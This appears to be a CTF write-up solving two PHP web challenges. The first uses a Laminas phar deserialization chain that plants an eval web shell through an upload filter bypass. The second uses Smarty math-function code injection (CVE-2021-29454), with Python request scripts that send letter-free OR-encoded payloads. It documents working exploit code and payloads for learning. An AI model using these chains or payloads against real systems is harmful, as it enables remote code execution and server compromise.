Fan website
The topic gave a hint, and it was related to laminas.
Scan the directory to get the source code.
The audit code found that the title has an album route, and the controller has only one /module/Album/src/Controller/AlbumController.php
It contains several processing functions, which can upload files and delete files.
But upload file filtering is a whitelist so it is not easy to bypass.
And there can't be any content in the content. <? HALT_COMPILER
This is a bit of no silverware here. Why filter HALT_COMPILER related to phar for no reason.
Searching for the vulnerability of this component on the Internet found a deserialization vulnerability https://xz.aliyun.com/t/8975, it is easy to say, we can upload a phar file, and then delete the file and trigger deserialization when calling unlink. But you have to ensure that the content is greater than 3kb, so add astr_repeat('123',1000000)
<?php
namespace Laminas\View\Resolver{
class TemplateMapResolver{
protected $map = ["setBody"=>"system"];
}
}
namespace Laminas\View\Renderer{
class PhpRenderer{
private $__helpers;
function __construct(){
$this->__helpers = new \Laminas\View\Resolver\TemplateMapResolver();
}
}
}
namespace Laminas\Log\Writer{
abstract class AbstractWriter{
}
class Mail extends AbstractWriter{
protected $eventsToMail = ["echo '<?php eval(\$_POST[1]);?>' > /var/www/public/a.php"]; // cmd cmd cmd
protected $subjectPrependText = null;
protected $mail;
function __construct(){
$this->mail = new \Laminas\View\Renderer\PhpRenderer();
}
}
}
namespace Laminas\Log{
class Logger{
protected $writers;
function __construct(){
$this->writers = [new \Laminas\Log\Writer\Mail()];
}
}
}
namespace{
$a = new \Laminas\Log\Logger();
$phar = new Phar("shell.phar"); //后缀名必须为 phar
$phar->startBuffering();
$phar -> setStub('GIF89a'.'<?php __HALT_COMPILER();?>');
$phar->setMetadata($a); //将自定义的 meta-data 存入 manifest
$phar->addFromString("a", str_repeat('123',1000000)); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
}
?>
The chain came out and there was a problem to be solved. Bypass <? and __HALT_COMPILER
to find an article online to https://www.wangan.com/p/7fygf7a00f0fd793
gzip the generated phar file. Then change the suffix to png.
Get the file path after the upload is complete.
Pass in phar:///var/www/public/img/00bf23e130fa1e525e332ff03dae345d.png where the file is deleted
After the ant sword is connected, the flag is obtained
Smarty_calculator
Scan the background to get the source code
. The title name is the test site for this question, the smarty template in php.
After searching, I found the related cve CVE-2021-29454 . After using the math in smarty to
learn a wave, it can be calculated by passing {math equation="(( x + y ) / z )" x=2 y=10 z=2}in.
And there is a related file src/Smarty/plugins/function.math.php
in the source code. The eval function is found in
it. The subject of the test should be the command execution vulnerability. Turning up, the content in the equation cannot contain backticks and $ and The number of left and right parentheses must match. In addition to this, a regular match is also performed.
Probably there is no hexadecimal, no letter at the beginning, otherwise, enter this foreach loop.
It is still a loop down, if the string used in the incoming content is not equation or format or assign, a replacement will be performed.
So if we avoid these two loops, we can splicing the incoming content and put it into eval.
It's easy to think of the letter rce without numbers. In this way, it will not be matched by the regular expression, and another loop can be bypassed (there are no other letters, and there is only one key value in $param).
The script without numbers and letters I wrote a relatively complete one before. https://blog.csdn.net/miuzzx/article/details/109143413Just use your own script.
Using the OR construction, let's try phpinfo first
import requests
import urllib.parse
url="http://eci-2ze9vv2h6yb0y4183bod.cloudeci1.ichunqiu.com/"
data={
'data':urllib.parse.unquote(''' {math equation="1;('%30%28%30%29%2e%26%2f'|'%40%40%40%40%40%40%40')();//" }''')}
r=requests.post(url,data=data,cookies={
'login':'1'})
print(r.text)
There is df, but a popen is left, so you can use popen to execute system commands.
Blindly guess a wave of flag path is /flag, execute the system command cp /flag a
, which is to construct a php statementpopen('cp /f* a','r')
import requests
import urllib.parse
url="http://eci-2ze9vv2h6yb0y4183bod.cloudeci1.ichunqiu.com/"
data={
'data':urllib.parse.unquote(''' {math equation="1;('%30%2f%30%25%2e'|'%40%40%40%40%40')(('%23%30%00%00%26%00%00%21'|'%40%40%20%2f%40%2a%20%40'),('%32'|'%40'));//" }''')}
r=requests.post(url,data=data,cookies={
'login':'1'})
print(r.text)
Visit /a to get flag
